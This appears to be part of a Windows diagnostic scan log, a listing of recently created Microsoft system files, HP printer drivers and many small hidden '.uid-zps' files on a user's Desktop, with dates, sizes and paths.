2019-04-10 09:36 - 2019-04-10 09:36 - 000000110 ____H C:\Users\TATTOO NR\Desktop\image.jpg.uid-zps
2019-04-10 09:12 - 2019-04-02 14:38 - 000094008 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2019-04-10 09:12 - 2019-04-02 14:18 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2019-04-10 09:12 - 2019-04-02 14:16 - 001030144 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-04-10 09:12 - 2019-04-02 14:15 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleprn.dll
2019-04-10 09:12 - 2019-04-02 14:13 - 001605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2019-04-10 09:12 - 2019-04-02 14:11 - 001857536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2019-04-10 09:12 - 2019-04-02 14:10 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys
2019-04-10 09:12 - 2019-04-02 14:10 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2019-04-10 09:12 - 2019-04-02 11:11 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2019-04-10 09:12 - 2019-04-02 11:10 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleprn.dll
2019-04-10 09:12 - 2019-04-02 11:07 - 001586688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 002467536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 000735680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 10:20 - 002719032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-04-10 09:12 - 2019-04-02 10:19 - 000786080 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 09:48 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbt.sys
2019-04-10 09:12 - 2019-04-02 09:47 - 001214464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2019-04-10 09:12 - 2019-04-02 09:45 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001724416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001421312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 07:05 - 001989544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000604008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000560600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001235968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 06:40 - 001073664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2019-04-10 09:12 - 2019-03-14 16:52 - 003933296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2019-04-10 09:12 - 2019-03-14 16:51 - 000157192 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2019-04-10 09:12 - 2019-03-14 16:35 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfoext.dll
2019-04-10 09:12 - 2019-03-14 16:34 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2019-04-10 09:12 - 2019-03-14 16:33 - 000182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpdr.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storqosflt.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 16:31 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000675328 _____ (Microsoft Corporation) C:\WINDOWS\system32\objsel.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000440832 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 16:29 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 16:28 - 000560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsound.dll
2019-04-10 09:12 - 2019-03-14 16:08 - 003611264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2019-04-10 09:12 - 2019-03-14 15:56 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2019-04-10 09:12 - 2019-03-14 15:55 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 15:53 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\objsel.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 15:52 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsound.dll
2019-04-10 09:12 - 2019-03-14 10:57 - 000611640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2019-04-10 09:12 - 2019-03-14 10:56 - 000375096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2019-04-10 09:12 - 2019-03-14 10:38 - 000090360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:37 - 001171568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:28 - 000152072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2019-04-10 09:12 - 2019-03-14 10:27 - 000097600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 002421048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-04-10 09:12 - 2019-03-14 10:26 - 001014344 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000481048 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000175416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2019-04-10 09:12 - 2019-03-14 10:22 - 002700288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2019-04-10 09:12 - 2019-03-14 10:19 - 002969600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credui.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 002258944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000195072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\negoexts.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 001070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000856576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2019-04-10 09:12 - 2019-03-14 10:13 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 10:13 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 004708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 002509824 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2019-04-10 09:12 - 2019-03-14 09:57 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 003392000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 003601920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000528896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-04-10 09:12 - 2019-03-14 09:55 - 000048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\credui.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000395776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000273408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2019-04-10 09:12 - 2019-03-14 09:54 - 000118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\negoexts.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000787968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2019-04-10 09:12 - 2019-03-14 09:53 - 000473600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000532992 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuietHours.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001216000 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2019-04-10 09:12 - 2019-03-14 09:51 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\TetheringMgr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 09:50 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2019-04-10 09:12 - 2019-03-14 03:57 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2019-04-09 15:01 - 2019-04-09 15:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51392159_284362515572546_4538713849758482432_n.jpg.uid-zps
2019-04-09 09:42 - 2019-04-09 09:42 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56513104_450817988996773_8509636489024372736_n.jpg.uid-zps
2019-04-04 09:10 - 2019-04-04 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgdgvdvs.jpg.uid-zps
2019-04-03 09:37 - 2019-04-03 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56661833_814410745562772_4941172643538665472_n.jpg.uid-zps
2019-04-02 09:59 - 2019-04-02 09:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\oak.jpg.uid-zps
2019-03-29 10:27 - 2019-03-29 10:27 - 000000110 ____H C:\Users\TATTOO NR\Desktop\7b0a60c4ceff6dc73ea538792e018659.jpg.uid-zps
2019-03-25 10:20 - 2019-03-25 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngdsvsvs.png.uid-zps
2019-03-25 10:16 - 2019-03-25 10:16 - 000000110 ____H C:\Users\TATTOO NR\Desktop\5a837c5dc14a471f7855cf3abb21bfb8.jpg.uid-zps
2019-03-21 10:25 - 2019-03-21 10:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\52838491_2053531971605785_4529059197068771328_n.jpg.uid-zps
2019-03-20 10:40 - 2019-03-20 10:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\fc95887d0b1ab9f8d12fc468d1ff861e--rose-jewelry-rose-tattoos.jpg.uid-zps
2019-03-19 10:24 - 2019-03-19 10:24 - 000000110 ____H C:\Users\TATTOO NR\Desktop\69782_2.jpg.uid-zps
2019-03-19 10:21 - 2019-03-19 10:21 - 000000110 ____H C:\Users\TATTOO NR\Desktop\165037545-256-k22498.jpg.uid-zps
2019-03-18 16:06 - 2019-03-18 16:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53735603_561863657655130_8592179309412614144_n.jpg.uid-zps
2019-03-18 16:02 - 2019-03-18 16:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51223793_480541505809113_1147320454936002560_n.jpg.uid-zps
2019-03-15 02:36 - 2019-03-15 02:36 - 003753088 _____ (Hewlett-Packard Development Company, LP) C:\WINDOWS\system32\HPScanTRDrv_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 002952200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkinsE311.exe
2019-03-15 02:36 - 2019-03-15 02:36 - 000592000 _____ (Hewlett-Packard) C:\WINDOWS\system32\HPWia2_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000392200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkstsE311LM.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000327688 _____ (HP Inc.) C:\WINDOWS\system32\hpinkcoiE311.dll
2019-03-13 16:00 - 2019-03-06 17:37 - 001616608 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-03-13 16:00 - 2019-03-06 17:14 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2019-03-13 16:00 - 2019-03-06 11:16 - 001188000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 11:04 - 000628024 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpx.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 002364928 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 000736256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2019-03-13 16:00 - 2019-03-06 08:14 - 000785568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 08:14 - 000450872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpx.dll
2019-03-13 16:00 - 2019-03-06 07:50 - 001347584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2019-03-13 16:00 - 2019-02-21 05:26 - 000313344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 002871304 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2019-03-13 16:00 - 2019-02-16 15:02 - 001644040 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000808456 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000735752 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000620040 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000460296 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000322568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000147464 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2019-03-13 16:00 - 2019-02-16 14:57 - 001048472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2019-03-13 16:00 - 2019-02-16 14:56 - 000549520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2019-03-13 16:00 - 2019-02-16 14:53 - 001516416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 004718080 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 001725952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:33 - 001786880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:32 - 002051072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001271808 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001003520 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 000615424 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2019-03-13 16:00 - 2019-02-16 14:30 - 002019840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2019-03-13 16:00 - 2019-02-16 14:22 - 001322176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:07 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001530880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001451520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 12:24 - 023862272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2019-03-13 16:00 - 2019-02-16 12:22 - 019525120 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2019-03-13 16:00 - 2019-02-16 10:16 - 000511800 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2019-03-13 16:00 - 2019-02-16 10:15 - 000505656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 007901392 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 000510288 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 005821440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 003291632 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001934800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001792712 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 000432952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 001209696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 10:01 - 001028920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 000594024 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-03-13 16:00 - 2019-02-16 09:57 - 000383288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2019-03-13 16:00 - 2019-02-16 09:53 - 000443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 002479168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 001584536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001805648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001011872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 09:37 - 009084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:36 - 007057408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2019-03-13 16:00 - 2019-02-16 09:34 - 005883904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2019-03-13 16:00 - 2019-02-16 09:33 - 006646784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:31 - 002825728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:30 - 001986560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:29 - 001768448 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 003381248 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 002585600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 001668096 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdprt.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 000686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 001225216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 000943616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000652800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2019-03-13 15:59 - 2019-03-06 17:36 - 001047352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2019-03-13 15:59 - 2019-03-06 17:17 - 000810496 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2019-03-13 15:59 - 2019-03-06 17:17 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2019-03-13 15:59 - 2019-03-06 17:12 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2019-03-13 15:59 - 2019-03-06 14:18 - 000918032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
